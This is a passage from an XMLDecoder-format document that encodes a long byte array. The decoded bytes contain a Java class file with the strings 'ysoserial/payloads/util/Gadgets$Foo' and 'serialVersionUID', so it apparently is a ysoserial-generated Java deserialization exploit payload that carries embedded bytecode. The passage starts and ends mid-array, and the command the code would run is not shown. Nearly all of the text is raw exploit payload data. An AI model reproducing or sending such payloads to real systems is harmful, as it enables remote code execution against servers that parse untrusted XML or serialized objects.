index=\"3753\"><byte>-74</byte></void><void index=\"3754\"><byte>0</byte></void><void index=\"3755\"><byte>53</byte></void><void index=\"3756\"><byte>-64</byte></void><void index=\"3757\"><byte>0</byte></void><void index=\"3758\"><byte>55</byte></void><void index=\"3759\"><byte>18</byte></void><void index=\"3760\"><byte>57</byte></void><void index=\"3761\"><byte>-74</byte></void><void index=\"3762\"><byte>0</byte></void><void index=\"3763\"><byte>61</byte></void><void index=\"3764\"><byte>77</byte></void><void index=\"3765\"><byte>-72</byte></void><void index=\"3766\"><byte>0</byte></void><void index=\"3767\"><byte>47</byte></void><void index=\"3768\"><byte>-64</byte></void><void index=\"3769\"><byte>0</byte></void><void index=\"3770\"><byte>49</byte></void><void index=\"3771\"><byte>-74</byte></void><void index=\"3772\"><byte>0</byte></void><void index=\"3773\"><byte>53</byte></void><void index=\"3774\"><byte>-64</byte></void><void index=\"3775\"><byte>0</byte></void><void index=\"3776\"><byte>55</byte></void><void index=\"3777\"><byte>-74</byte></void><void index=\"3778\"><byte>0</byte></void><void index=\"3779\"><byte>65</byte></void><void index=\"3780\"><byte>78</byte></void><void index=\"3781\"><byte>45</byte></void><void index=\"3782\"><byte>18</byte></void><void index=\"3783\"><byte>67</byte></void><void index=\"3784\"><byte>-74</byte></void><void index=\"3785\"><byte>0</byte></void><void index=\"3786\"><byte>73</byte></void><void index=\"3787\"><byte>45</byte></void><void index=\"3788\"><byte>-74</byte></void><void index=\"3789\"><byte>0</byte></void><void index=\"3790\"><byte>77</byte></void><void index=\"3791\"><byte>58</byte></void><void index=\"3792\"><byte>4</byte></void><void index=\"3793\"><byte>25</byte></void><void index=\"3794\"><byte>4</byte></void><void index=\"3795\"><byte>-69</byte></void><void index=\"3796\"><byte>0</byte></void><void index=\"3797\"><byte>79</byte></void><void index=\"3798\"><byte>89</byte></void><void index=\"3799\"><byte>-69</byte></void><void index=\"3800\"><byte>0</byte></void><void index=\"3801\"><byte>81</byte></void><void index=\"3802\"><byte>89</byte></void><void index=\"3803\"><byte>-73</byte></void><void index=\"3804\"><byte>0</byte></void><void index=\"3805\"><byte>82</byte></void><void index=\"3806\"><byte>44</byte></void><void index=\"3807\"><byte>-74</byte></void><void index=\"3808\"><byte>0</byte></void><void index=\"3809\"><byte>86</byte></void><void index=\"3810\"><byte>18</byte></void><void index=\"3811\"><byte>88</byte></void><void index=\"3812\"><byte>-74</byte></void><void index=\"3813\"><byte>0</byte></void><void index=\"3814\"><byte>86</byte></void><void index=\"3815\"><byte>-74</byte></void><void index=\"3816\"><byte>0</byte></void><void index=\"3817\"><byte>92</byte></void><void index=\"3818\"><byte>-73</byte></void><void index=\"3819\"><byte>0</byte></void><void index=\"3820\"><byte>94</byte></void><void index=\"3821\"><byte>-74</byte></void><void index=\"3822\"><byte>0</byte></void><void index=\"3823\"><byte>100</byte></void><void index=\"3824\"><byte>25</byte></void><void index=\"3825\"><byte>4</byte></void><void index=\"3826\"><byte>-74</byte></void><void index=\"3827\"><byte>0</byte></void><void index=\"3828\"><byte>103</byte></void><void index=\"3829\"><byte>18</byte></void><void index=\"3830\"><byte>105</byte></void><void index=\"3831\"><byte>-72</byte></void><void index=\"3832\"><byte>0</byte></void><void index=\"3833\"><byte>110</byte></void><void index=\"3834\"><byte>58</byte></void><void index=\"3835\"><byte>5</byte></void><void index=\"3836\"><byte>25</byte></void><void index=\"3837\"><byte>5</byte></void><void index=\"3838\"><byte>1</byte></void><void index=\"3839\"><byte>-91</byte></void><void index=\"3840\"><byte>0</byte></void><void index=\"3841\"><byte>16</byte></void><void index=\"3842\"><byte>25</byte></void><void index=\"3843\"><byte>5</byte></void><void index=\"3844\"><byte>-74</byte></void><void index=\"3845\"><byte>0</byte></void><void index=\"3846\"><byte>115</byte></void><void index=\"3847\"><byte>18</byte></void><void index=\"3848\"><byte>117</byte></void><void index=\"3849\"><byte>-74</byte></void><void index=\"3850\"><byte>0</byte></void><void index=\"3851\"><byte>121</byte></void><void index=\"3852\"><byte>-102</byte></void><void index=\"3853\"><byte>0</byte></void><void index=\"3854\"><byte>6</byte></void><void index=\"3855\"><byte>-89</byte></void><void index=\"3856\"><byte>0</byte></void><void index=\"3857\"><byte>33</byte></void><void index=\"3858\"><byte>-72</byte></void><void index=\"3859\"><byte>0</byte></void><void index=\"3860\"><byte>127</byte></void><void index=\"3861\"><byte>-69</byte></void><void index=\"3862\"><byte>0</byte></void><void index=\"3863\"><byte>81</byte></void><void index=\"3864\"><byte>89</byte></void><void index=\"3865\"><byte>-73</byte></void><void index=\"3866\"><byte>0</byte></void><void index=\"3867\"><byte>82</byte></void><void index=\"3868\"><byte>18</byte></void><void index=\"3869\"><byte>-127</byte></void><void index=\"3870\"><byte>-74</byte></void><void index=\"3871\"><byte>0</byte></void><void index=\"3872\"><byte>86</byte></void><void index=\"3873\"><byte>44</byte></void><void index=\"3874\"><byte>-74</byte></void><void index=\"3875\"><byte>0</byte></void><void index=\"3876\"><byte>86</byte></void><void index=\"3877\"><byte>-74</byte></void><void index=\"3878\"><byte>0</byte></void><void index=\"3879\"><byte>92</byte></void><void index=\"3880\"><byte>-74</byte></void><void index=\"3881\"><byte>0</byte></void><void index=\"3882\"><byte>-123</byte></void><void index=\"3883\"><byte>58</byte></void><void index=\"3884\"><byte>6</byte></void><void index=\"3885\"><byte>-89</byte></void><void index=\"3886\"><byte>0</byte></void><void index=\"3887\"><byte>30</byte></void><void index=\"3888\"><byte>-72</byte></void><void index=\"3889\"><byte>0</byte></void><void index=\"3890\"><byte>127</byte></void><void index=\"3891\"><byte>-69</byte></void><void index=\"3892\"><byte>0</byte></void><void index=\"3893\"><byte>81</byte></void><void index=\"3894\"><byte>89</byte></void><void index=\"3895\"><byte>-73</byte></void><void index=\"3896\"><byte>0</byte></void><void index=\"3897\"><byte>82</byte></void><void index=\"3898\"><byte>18</byte></void><void index=\"3899\"><byte>-121</byte></void><void index=\"3900\"><byte>-74</byte></void><void index=\"3901\"><byte>0</byte></void><void index=\"3902\"><byte>86</byte></void><void index=\"3903\"><byte>44</byte></void><void index=\"3904\"><byte>-74</byte></void><void index=\"3905\"><byte>0</byte></void><void index=\"3906\"><byte>86</byte></void><void index=\"3907\"><byte>-74</byte></void><void index=\"3908\"><byte>0</byte></void><void index=\"3909\"><byte>92</byte></void><void index=\"3910\"><byte>-74</byte></void><void index=\"3911\"><byte>0</byte></void><void index=\"3912\"><byte>-123</byte></void><void index=\"3913\"><byte>58</byte></void><void index=\"3914\"><byte>6</byte></void><void index=\"3915\"><byte>-69</byte></void><void index=\"3916\"><byte>0</byte></void><void index=\"3917\"><byte>-119</byte></void><void index=\"3918\"><byte>89</byte></void><void index=\"3919\"><byte>-69</byte></void><void index=\"3920\"><byte>0</byte></void><void index=\"3921\"><byte>-117</byte></void><void index=\"3922\"><byte>89</byte></void><void index=\"3923\"><byte>25</byte></void><void index=\"3924\"><byte>6</byte></void><void index=\"3925\"><byte>-74</byte></void><void index=\"3926\"><byte>0</byte></void><void index=\"3927\"><byte>-111</byte></void><void index=\"3928\"><byte>18</byte></void><void index=\"3929\"><byte>67</byte></void><void index=\"3930\"><byte>-73</byte></void><void index=\"3931\"><byte>0</byte></void><void index=\"3932\"><byte>-108</byte></void><void index=\"3933\"><byte>-73</byte></void><void index=\"3934\"><byte>0</byte></void><void index=\"3935\"><byte>-105</byte></void><void index=\"3936\"><byte>58</byte></void><void index=\"3937\"><byte>7</byte></void><void index=\"3938\"><byte>1</byte></void><void index=\"3939\"><byte>58</byte></void><void index=\"3940\"><byte>8</byte></void><void index=\"3941\"><byte>18</byte></void><void index=\"3942\"><byte>-103</byte></void><void index=\"3943\"><byte>58</byte></void><void index=\"3944\"><byte>9</byte></void><void index=\"3945\"><byte>-89</byte></void><void index=\"3946\"><byte>0</byte></void><void index=\"3947\"><byte>25</byte></void><void index=\"3948\"><byte>-69</byte></void><void index=\"3949\"><byte>0</byte></void><void index=\"3950\"><byte>81</byte></void><void index=\"3951\"><byte>89</byte></void><void index=\"3952\"><byte>-73</byte></void><void index=\"3953\"><byte>0</byte></void><void index=\"3954\"><byte>82</byte></void><void index=\"3955\"><byte>25</byte></void><void index=\"3956\"><byte>9</byte></void><void index=\"3957\"><byte>-74</byte></void><void index=\"3958\"><byte>0</byte></void><void index=\"3959\"><byte>86</byte></void><void index=\"3960\"><byte>25</byte></void><void index=\"3961\"><byte>8</byte></void><void index=\"3962\"><byte>-74</byte></void><void index=\"3963\"><byte>0</byte></void><void index=\"3964\"><byte>86</byte></void><void index=\"3965\"><byte>-74</byte></void><void index=\"3966\"><byte>0</byte></void><void index=\"3967\"><byte>92</byte></void><void index=\"3968\"><byte>58</byte></void><void index=\"3969\"><byte>9</byte></void><void index=\"3970\"><byte>25</byte></void><void index=\"3971\"><byte>7</byte></void><void index=\"3972\"><byte>-74</byte></void><void index=\"3973\"><byte>0</byte></void><void index=\"3974\"><byte>-100</byte></void><void index=\"3975\"><byte>89</byte></void><void index=\"3976\"><byte>58</byte></void><void index=\"3977\"><byte>8</byte></void><void index=\"3978\"><byte>1</byte></void><void index=\"3979\"><byte>-90</byte></void><void index=\"3980\"><byte>-1</byte></void><void index=\"3981\"><byte>-31</byte></void><void index=\"3982\"><byte>45</byte></void><void index=\"3983\"><byte>-74</byte></void><void index=\"3984\"><byte>0</byte></void><void index=\"3985\"><byte>-96</byte></void><void index=\"3986\"><byte>25</byte></void><void index=\"3987\"><byte>9</byte></void><void index=\"3988\"><byte>-74</byte></void><void index=\"3989\"><byte>0</byte></void><void index=\"3990\"><byte>-91</byte></void><void index=\"3991\"><byte>-89</byte></void><void index=\"3992\"><byte>0</byte></void><void index=\"3993\"><byte>24</byte></void><void index=\"3994\"><byte>58</byte></void><void index=\"3995\"><byte>10</byte></void><void index=\"3996\"><byte>-78</byte></void><void index=\"3997\"><byte>0</byte></void><void index=\"3998\"><byte>-85</byte></void><void index=\"3999\"><byte>25</byte></void><void index=\"4000\"><byte>10</byte></void><void index=\"4001\"><byte>-74</byte></void><void index=\"4002\"><byte>0</byte></void><void index=\"4003\"><byte>-82</byte></void><void index=\"4004\"><byte>-74</byte></void><void index=\"4005\"><byte>0</byte></void><void index=\"4006\"><byte>-77</byte></void><void index=\"4007\"><byte>25</byte></void><void index=\"4008\"><byte>10</byte></void><void index=\"4009\"><byte>-74</byte></void><void index=\"4010\"><byte>0</byte></void><void index=\"4011\"><byte>-74</byte></void><void index=\"4012\"><byte>-89</byte></void><void index=\"4013\"><byte>0</byte></void><void index=\"4014\"><byte>3</byte></void><void index=\"4015\"><byte>-79</byte></void><void index=\"4016\"><byte>0</byte></void><void index=\"4017\"><byte>1</byte></void><void index=\"4018\"><byte>0</byte></void><void index=\"4019\"><byte>94</byte></void><void index=\"4020\"><byte>0</byte></void><void index=\"4021\"><byte>-7</byte></void><void index=\"4022\"><byte>0</byte></void><void index=\"4023\"><byte>-4</byte></void><void index=\"4024\"><byte>0</byte></void><void index=\"4025\"><byte>-89</byte></void><void index=\"4026\"><byte>0</byte></void><void index=\"4027\"><byte>1</byte></void><void index=\"4028\"><byte>0</byte></void><void index=\"4029\"><byte>-73</byte></void><void index=\"4030\"><byte>0</byte></void><void index=\"4031\"><byte>0</byte></void><void index=\"4032\"><byte>0</byte></void><void index=\"4033\"><byte>70</byte></void><void index=\"4034\"><byte>0</byte></void><void index=\"4035\"><byte>9</byte></void><void index=\"4036\"><byte>3</byte></void><void index=\"4037\"><byte>-1</byte></void><void index=\"4038\"><byte>0</byte></void><void index=\"4039\"><byte>109</byte></void><void index=\"4040\"><byte>0</byte></void><void index=\"4041\"><byte>6</byte></void><void index=\"4042\"><byte>0</byte></void><void index=\"4043\"><byte>5</byte></void><void index=\"4044\"><byte>7</byte></void><void index=\"4045\"><byte>0</byte></void><void index=\"4046\"><byte>112</byte></void><void index=\"4047\"><byte>7</byte></void><void index=\"4048\"><byte>0</byte></void><void index=\"4049\"><byte>69</byte></void><void index=\"4050\"><byte>7</byte></void><void index=\"4051\"><byte>0</byte></void><void index=\"4052\"><byte>96</byte></void><void index=\"4053\"><byte>7</byte></void><void index=\"4054\"><byte>0</byte></void><void index=\"4055\"><byte>112</byte></void><void index=\"4056\"><byte>0</byte></void><void index=\"4057\"><byte>0</byte></void><void index=\"4058\"><byte>2</byte></void><void index=\"4059\"><byte>29</byte></void><void index=\"4060\"><byte>-4</byte></void><void index=\"4061\"><byte>0</byte></void><void index=\"4062\"><byte>26</byte></void><void index=\"4063\"><byte>7</byte></void><void index=\"4064\"><byte>0</byte></void><void index=\"4065\"><byte>-115</byte></void><void index=\"4066\"><byte>-2</byte></void><void index=\"4067\"><byte>0</byte></void><void index=\"4068\"><byte>32</byte></void><void index=\"4069\"><byte>7</byte></void><void index=\"4070\"><byte>0</byte></void><void index=\"4071\"><byte>-119</byte></void><void index=\"4072\"><byte>7</byte></void><void index=\"4073\"><byte>0</byte></void><void index=\"4074\"><byte>112</byte></void><void index=\"4075\"><byte>7</byte></void><void index=\"4076\"><byte>0</byte></void><void index=\"4077\"><byte>112</byte></void><void index=\"4078\"><byte>21</byte></void><void index=\"4079\"><byte>-1</byte></void><void index=\"4080\"><byte>0</byte></void><void index=\"4081\"><byte>23</byte></void><void index=\"4082\"><byte>0</byte></void><void index=\"4083\"><byte>6</byte></void><void index=\"4084\"><byte>0</byte></void><void index=\"4085\"><byte>5</byte></void><void index=\"4086\"><byte>7</byte></void><void index=\"4087\"><byte>0</byte></void><void index=\"4088\"><byte>112</byte></void><void index=\"4089\"><byte>7</byte></void><void index=\"4090\"><byte>0</byte></void><void index=\"4091\"><byte>69</byte></void><void index=\"4092\"><byte>7</byte></void><void index=\"4093\"><byte>0</byte></void><void index=\"4094\"><byte>96</byte></void><void index=\"4095\"><byte>7</byte></void><void index=\"4096\"><byte>0</byte></void><void index=\"4097\"><byte>112</byte></void><void index=\"4098\"><byte>0</byte></void><void index=\"4099\"><byte>1</byte></void><void index=\"4100\"><byte>7</byte></void><void index=\"4101\"><byte>0</byte></void><void index=\"4102\"><byte>-89</byte></void><void index=\"4103\"><byte>20</byte></void><void index=\"4104\"><byte>0</byte></void><void index=\"4105\"><byte>2</byte></void><void index=\"4106\"><byte>0</byte></void><void index=\"4107\"><byte>32</byte></void><void index=\"4108\"><byte>0</byte></void><void index=\"4109\"><byte>0</byte></void><void index=\"4110\"><byte>0</byte></void><void index=\"4111\"><byte>2</byte></void><void index=\"4112\"><byte>0</byte></void><void index=\"4113\"><byte>33</byte></void><void index=\"4114\"><byte>0</byte></void><void index=\"4115\"><byte>17</byte></void><void index=\"4116\"><byte>0</byte></void><void index=\"4117\"><byte>0</byte></void><void index=\"4118\"><byte>0</byte></void><void index=\"4119\"><byte>10</byte></void><void index=\"4120\"><byte>0</byte></void><void index=\"4121\"><byte>1</byte></void><void index=\"4122\"><byte>0</byte></void><void index=\"4123\"><byte>2</byte></void><void index=\"4124\"><byte>0</byte></void><void index=\"4125\"><byte>35</byte></void><void index=\"4126\"><byte>0</byte></void><void index=\"4127\"><byte>16</byte></void><void index=\"4128\"><byte>0</byte></void><void index=\"4129\"><byte>9</byte></void><void index=\"4130\"><byte>117</byte></void><void index=\"4131\"><byte>113</byte></void><void index=\"4132\"><byte>0</byte></void><void index=\"4133\"><byte>126</byte></void><void index=\"4134\"><byte>0</byte></void><void index=\"4135\"><byte>13</byte></void><void index=\"4136\"><byte>0</byte></void><void index=\"4137\"><byte>0</byte></void><void index=\"4138\"><byte>1</byte></void><void index=\"4139\"><byte>-44</byte></void><void index=\"4140\"><byte>-54</byte></void><void index=\"4141\"><byte>-2</byte></void><void index=\"4142\"><byte>-70</byte></void><void index=\"4143\"><byte>-66</byte></void><void index=\"4144\"><byte>0</byte></void><void index=\"4145\"><byte>0</byte></void><void index=\"4146\"><byte>0</byte></void><void index=\"4147\"><byte>50</byte></void><void index=\"4148\"><byte>0</byte></void><void index=\"4149\"><byte>27</byte></void><void index=\"4150\"><byte>10</byte></void><void index=\"4151\"><byte>0</byte></void><void index=\"4152\"><byte>3</byte></void><void index=\"4153\"><byte>0</byte></void><void index=\"4154\"><byte>21</byte></void><void index=\"4155\"><byte>7</byte></void><void index=\"4156\"><byte>0</byte></void><void index=\"4157\"><byte>23</byte></void><void index=\"4158\"><byte>7</byte></void><void index=\"4159\"><byte>0</byte></void><void index=\"4160\"><byte>24</byte></void><void index=\"4161\"><byte>7</byte></void><void index=\"4162\"><byte>0</byte></void><void index=\"4163\"><byte>25</byte></void><void index=\"4164\"><byte>1</byte></void><void index=\"4165\"><byte>0</byte></void><void index=\"4166\"><byte>16</byte></void><void index=\"4167\"><byte>115</byte></void><void index=\"4168\"><byte>101</byte></void><void index=\"4169\"><byte>114</byte></void><void index=\"4170\"><byte>105</byte></void><void index=\"4171\"><byte>97</byte></void><void index=\"4172\"><byte>108</byte></void><void index=\"4173\"><byte>86</byte></void><void index=\"4174\"><byte>101</byte></void><void index=\"4175\"><byte>114</byte></void><void index=\"4176\"><byte>115</byte></void><void index=\"4177\"><byte>105</byte></void><void index=\"4178\"><byte>111</byte></void><void index=\"4179\"><byte>110</byte></void><void index=\"4180\"><byte>85</byte></void><void index=\"4181\"><byte>73</byte></void><void index=\"4182\"><byte>68</byte></void><void index=\"4183\"><byte>1</byte></void><void index=\"4184\"><byte>0</byte></void><void index=\"4185\"><byte>1</byte></void><void index=\"4186\"><byte>74</byte></void><void index=\"4187\"><byte>1</byte></void><void index=\"4188\"><byte>0</byte></void><void index=\"4189\"><byte>13</byte></void><void index=\"4190\"><byte>67</byte></void><void index=\"4191\"><byte>111</byte></void><void index=\"4192\"><byte>110</byte></void><void index=\"4193\"><byte>115</byte></void><void index=\"4194\"><byte>116</byte></void><void index=\"4195\"><byte>97</byte></void><void index=\"4196\"><byte>110</byte></void><void index=\"4197\"><byte>116</byte></void><void index=\"4198\"><byte>86</byte></void><void index=\"4199\"><byte>97</byte></void><void index=\"4200\"><byte>108</byte></void><void index=\"4201\"><byte>117</byte></void><void index=\"4202\"><byte>101</byte></void><void index=\"4203\"><byte>5</byte></void><void index=\"4204\"><byte>113</byte></void><void index=\"4205\"><byte>-26</byte></void><void index=\"4206\"><byte>105</byte></void><void index=\"4207\"><byte>-18</byte></void><void index=\"4208\"><byte>60</byte></void><void index=\"4209\"><byte>109</byte></void><void index=\"4210\"><byte>71</byte></void><void index=\"4211\"><byte>24</byte></void><void index=\"4212\"><byte>1</byte></void><void index=\"4213\"><byte>0</byte></void><void index=\"4214\"><byte>6</byte></void><void index=\"4215\"><byte>60</byte></void><void index=\"4216\"><byte>105</byte></void><void index=\"4217\"><byte>110</byte></void><void index=\"4218\"><byte>105</byte></void><void index=\"4219\"><byte>116</byte></void><void index=\"4220\"><byte>62</byte></void><void index=\"4221\"><byte>1</byte></void><void index=\"4222\"><byte>0</byte></void><void index=\"4223\"><byte>3</byte></void><void index=\"4224\"><byte>40</byte></void><void index=\"4225\"><byte>41</byte></void><void index=\"4226\"><byte>86</byte></void><void index=\"4227\"><byte>1</byte></void><void index=\"4228\"><byte>0</byte></void><void index=\"4229\"><byte>4</byte></void><void index=\"4230\"><byte>67</byte></void><void index=\"4231\"><byte>111</byte></void><void index=\"4232\"><byte>100</byte></void><void index=\"4233\"><byte>101</byte></void><void index=\"4234\"><byte>1</byte></void><void index=\"4235\"><byte>0</byte></void><void index=\"4236\"><byte>15</byte></void><void index=\"4237\"><byte>76</byte></void><void index=\"4238\"><byte>105</byte></void><void index=\"4239\"><byte>110</byte></void><void index=\"4240\"><byte>101</byte></void><void index=\"4241\"><byte>78</byte></void><void index=\"4242\"><byte>117</byte></void><void index=\"4243\"><byte>109</byte></void><void index=\"4244\"><byte>98</byte></void><void index=\"4245\"><byte>101</byte></void><void index=\"4246\"><byte>114</byte></void><void index=\"4247\"><byte>84</byte></void><void index=\"4248\"><byte>97</byte></void><void index=\"4249\"><byte>98</byte></void><void index=\"4250\"><byte>108</byte></void><void index=\"4251\"><byte>101</byte></void><void index=\"4252\"><byte>1</byte></void><void index=\"4253\"><byte>0</byte></void><void index=\"4254\"><byte>18</byte></void><void index=\"4255\"><byte>76</byte></void><void index=\"4256\"><byte>111</byte></void><void index=\"4257\"><byte>99</byte></void><void index=\"4258\"><byte>97</byte></void><void index=\"4259\"><byte>108</byte></void><void index=\"4260\"><byte>86</byte></void><void index=\"4261\"><byte>97</byte></void><void index=\"4262\"><byte>114</byte></void><void index=\"4263\"><byte>105</byte></void><void index=\"4264\"><byte>97</byte></void><void index=\"4265\"><byte>98</byte></void><void index=\"4266\"><byte>108</byte></void><void index=\"4267\"><byte>101</byte></void><void index=\"4268\"><byte>84</byte></void><void index=\"4269\"><byte>97</byte></void><void index=\"4270\"><byte>98</byte></void><void index=\"4271\"><byte>108</byte></void><void index=\"4272\"><byte>101</byte></void><void index=\"4273\"><byte>1</byte></void><void index=\"4274\"><byte>0</byte></void><void index=\"4275\"><byte>4</byte></void><void index=\"4276\"><byte>116</byte></void><void index=\"4277\"><byte>104</byte></void><void index=\"4278\"><byte>105</byte></void><void index=\"4279\"><byte>115</byte></void><void index=\"4280\"><byte>1</byte></void><void index=\"4281\"><byte>0</byte></void><void index=\"4282\"><byte>3</byte></void><void index=\"4283\"><byte>70</byte></void><void index=\"4284\"><byte>111</byte></void><void index=\"4285\"><byte>111</byte></void><void index=\"4286\"><byte>1</byte></void><void index=\"4287\"><byte>0</byte></void><void index=\"4288\"><byte>12</byte></void><void index=\"4289\"><byte>73</byte></void><void index=\"4290\"><byte>110</byte></void><void index=\"4291\"><byte>110</byte></void><void index=\"4292\"><byte>101</byte></void><void index=\"4293\"><byte>114</byte></void><void index=\"4294\"><byte>67</byte></void><void index=\"4295\"><byte>108</byte></void><void index=\"4296\"><byte>97</byte></void><void index=\"4297\"><byte>115</byte></void><void index=\"4298\"><byte>115</byte></void><void index=\"4299\"><byte>101</byte></void><void index=\"4300\"><byte>115</byte></void><void index=\"4301\"><byte>1</byte></void><void index=\"4302\"><byte>0</byte></void><void index=\"4303\"><byte>37</byte></void><void index=\"4304\"><byte>76</byte></void><void index=\"4305\"><byte>121</byte></void><void index=\"4306\"><byte>115</byte></void><void index=\"4307\"><byte>111</byte></void><void index=\"4308\"><byte>115</byte></void><void index=\"4309\"><byte>101</byte></void><void index=\"4310\"><byte>114</byte></void><void index=\"4311\"><byte>105</byte></void><void index=\"4312\"><byte>97</byte></void><void index=\"4313\"><byte>108</byte></void><void index=\"4314\"><byte>47</byte></void><void index=\"4315\"><byte>112</byte></void><void index=\"4316\"><byte>97</byte></void><void index=\"4317\"><byte>121</byte></void><void index=\"4318\"><byte>108</byte></void><void index=\"4319\"><byte>111</byte></void><void index=\"4320\"><byte>97</byte></void><void index=\"4321\"><byte>100</byte></void><void index=\"4322\"><byte>115</byte></void><void index=\"4323\"><byte>47</byte></void><void index=\"4324\"><byte>117</byte></void><void index=\"4325\"><byte>116</byte></void><void index=\"4326\"><byte>105</byte></void><void index=\"4327\"><byte>108</byte></void><void index=\"4328\"><byte>47</byte></void><void index=\"4329\"><byte>71</byte></void><void index=\"4330\"><byte>97</byte></void><void index=\"4331\"><byte>100</byte></void><void index=\"4332\"><byte>103</byte></void><void index=\"4333\"><byte>101</byte></void><void index=\"4334\"><byte>116</byte></void><void index=\"4335\"><byte>115</byte></void><void index=\"4336\"><byte>36</byte></void><void index=\"4337\"><byte>70</byte></void><void index=\"4338\"><byte>111</byte></void><void index=\"4339\"><byte>111</byte></void><void index=\"4340\"><byte>59</byte></void><void index=\"4341\"><byte>1</byte></void><void index=\"4342\"><byte>0</byte></void><void index=\"4343\"><byte>10</byte></void><void index=\"4344\"><byte>83</byte></void><void index=\"4345\"><byte>111</byte></void><void index=\"4346\"><byte>117</byte></void><void index=\"4347\"><byte>114</byte></void><void index=\"4348\"><byte>99</byte></void><void index=\"4349\"><byte>101</byte></void><void index=\"4350\"><byte>70</byte></void><void index=\"4351\"><byte>105</byte></void><void index=\"4352\"><byte>108</byte></void><void index=\"4353\"><byte>101</byte></void><void index=\"4354\"><byte>1</byte></void><void index=\"4355\"><byte>0</byte></void><void index=\"4356\"><byte>12</byte></void><void index=\"4357\"><byte>71</byte></void><void index=\"4358\"><byte>97</byte></void><void index=\"4359\"><byte>100</byte></void><void index=\"4360\"><byte>103</byte></void><void index=\"4361\"><byte>101</byte></void><void index=\"4362\"><byte>116</byte></void><void index=\"4363\"><byte>115</byte></void><void index=\"4364\"><byte>46</byte></void><void index=\"4365\"><byte>106</byte></void><void index=\"4366\"><byte>97</byte></void><void index=\"4367\"><byte>118</byte></void><void index=\"4368\"><byte>97</byte></void><void index=\"4369\"><byte>12</byte></void><void index=\"4370\"><byte>0</byte></void><void index=\"4371\"><byte>10</byte></void><void index=\"4372\"><byte>0</byte></void><void index=\"4373\"><byte>11</byte></void><void index=\"4374\"><byte>7</byte></void><void index=\"4375\"><byte>0</byte></void><void index=\"4376\"><byte>26</byte></void><void index=\"4377\"><byte>1</byte></void><void index=\"4378\"><byte>0</byte></void><void index=\"4379\"><byte>35</byte></void><void index=\"4380\"><byte>121</byte></void><void index=\"4381\"><byte>115</byte></void><void index=\"4382\"><byte>111</byte></void><void index=\"4383\"><byte>115</byte></void><void index=\"4384\"><byte>101</byte></void><void index=\"4385\"><byte>114</byte></void><void index=\"4386\"><byte>105</byte></void><void index=\"4387\"><byte>97</byte></void><void index=\"4388\"><byte>108</byte></void><void index=\"4389\"><byte>47</byte></void><void index=\"4390\"><byte>112</byte></void><void index=\"4391\"><byte>97</byte></void><void index=\"4392\"><byte>121</byte></void><void index=\"4393\"><byte>108</byte></void><void index=\"4394\"><byte>111</byte></void><void index=\"4395\"><byte>97</byte></void><void index=\"4396\"><byte>100</byte></void><void index=\"4397\"><byte>115</byte></void><void index=\"4398\"><byte>47</byte></void><void index=\"4399\"><byte>117</byte></void><void index=\"4400\"><byte>116</byte></void><void index=\"4401\"><byte>105</byte></void><void index=\"4402\"><byte>108</byte></void><void index=\"4403\"><byte>47</byte></void><void index=\"4404\"><byte>71</byte></void><void index=\"4405\"><byte>97</byte></void><void index=\"4406\"><byte>100</byte></void><void index=\"4407\"><byte>103</byte></void><void index=\"4408\"><byte>101</byte></void><void index=\"4409\"><byte>116</byte></void><void index=\"4410\"><byte>115</byte></void><void index=\"4411\"><byte>36</byte></void><void index=\"4412\"><byte>70</byte></void><void index=\"4413\"><byte>111</byte></void><void index=\"4414\"><byte>111</byte></void><void index=\"4415\"><byte>1</byte></void><void index=\"4416\"><byte>0</byte></void><void index=\"4417\"><byte>16</byte></void><void index=\"4418\"><byte>106</byte></void><void index=\"4419\"><byte>97</byte></void><void index=\"4420\"><byte>118</byte></void><void index=\"4421\"><byte>97</byte></void><void index=\"4422\"><byte>47</byte></void><void index=\"4423\"><byte>108</byte></void><void index=\"4424\"><byte>97</byte></void><void index=\"4425\"><byte>110</byte></void><void index=\"4426\"><byte>103</byte></void><void index=\"4427\"><byte>47</byte></void><void index=\"4428\"><byte>79</byte></void><void index=\"4429\"><byte>98</byte></void><void index=\"4430\"><byte>106</byte></void><void index=\"4431\"><byte>101</byte></void><void index=\"4432\"><byte>99</byte></void><void index=\"4433\"><byte>116</byte></void><void index=\"4434\"><byte>1</byte></void><void index=\"4435\"><byte>0</byte></void><void index=\"4436\"><byte>20</byte></void><void index=\"4437\"><byte>106</byte></void><void index=\"4438\"><byte>97</byte></void><void index=\"4439\"><byte>118</byte></void><void index=\"4440\"><byte>97</byte></void><void index=\"4441\"><byte>47</byte></void><void index=\"4442\"><byte>105</byte></void><void index=\"4443\"><byte>111</byte></void><void index=\"4444\"><byte>47</byte></void><void index=\"4445\"><byte>83</byte></void><void index=\"4446\"><byte>101</byte></void><void index=\"4447\"><byte>114</byte></void><void index=\"4448\"><byte>105</byte></void><void index=\"4449\"><byte>97</byte></void><void index=\"4450\"><byte>108</byte></void><void index=\"4451\"><byte>105</byte></void><void index=\"4452\"><byte>122</byte></void><void index=\"4453\"><byte>97</byte></void><void index=\"4454\"><byte>98</byte></void><void index=\"4455\"><byte>108</byte></void><void index=\"4456\"><byte>101</byte></void><void index=\"4457\"><byte>1</byte></void><void index=\"4458\"><byte>0</byte></void><void index=\"4459\"><byte>31</byte></void><void index=\"4460\"><byte>121</byte></void><void index=\"4461\"><byte>115</byte></void><void index=\"4462\"><byte>111</byte></void><void index=\"4463\"><byte>115</byte></void><void index=\"4464\"><byte>101</byte></void><void index=\"4465\"><byte>114</byte></void><void index=\"4466\"><byte>105</byte></void><void index=\"4467\"><byte>97</byte></void><void index=\"4468\"><byte>108</byte></void><void index=\"4469\"><byte>47</byte></void><void index=\"4470\"><byte>112</byte></void><void index=\"4471\"><byte>97</byte></void><void index=\"4472\"><byte>121</byte></void><void index=\"4473\"><byte>108</byte></void><void index=\"4474\"><byte>111</byte></void><void index=\"4475\"><byte>97</byte></void><void index=\"4476\"><byte>100</byte></void><void index=\"4477\"><byte>115</byte></void><void index=\"4478\"><byte>47</byte></void><void index=\"4479\"><byte>117</byte></void><void index=\"4480\"><byte>116</byte></void><void index=\"4481\"><byte>105</byte></void><void index=\"4482\"><byte>108</byte></void><void index=\"4483\"><byte>47</byte></void><void index=\"4484\"><byte>71</byte></void><void index=\"4485\"><byte>97</byte></void><void index=\"4486\"><byte>100</byte></void><void index=\"4487\"><byte>103</byte></void><void index=\"4488\"><byte>101</byte></void><void index=\"4489\"><byte>116</byte></void><void index=\"4490\"><byte>115</byte></void><void index=\"4491\"><byte>0</byte></void><void index=\"4492\"><byte>33</byte></void><void index=\"4493\"><byte>0</byte></void><void index=\"4494\"><byte>2</byte></void><void index=\"4495\"><byte>0</byte></void><void index=\"4496\"><byte>3</byte></void><void index=\"4497\"><byte>0</byte></void><void 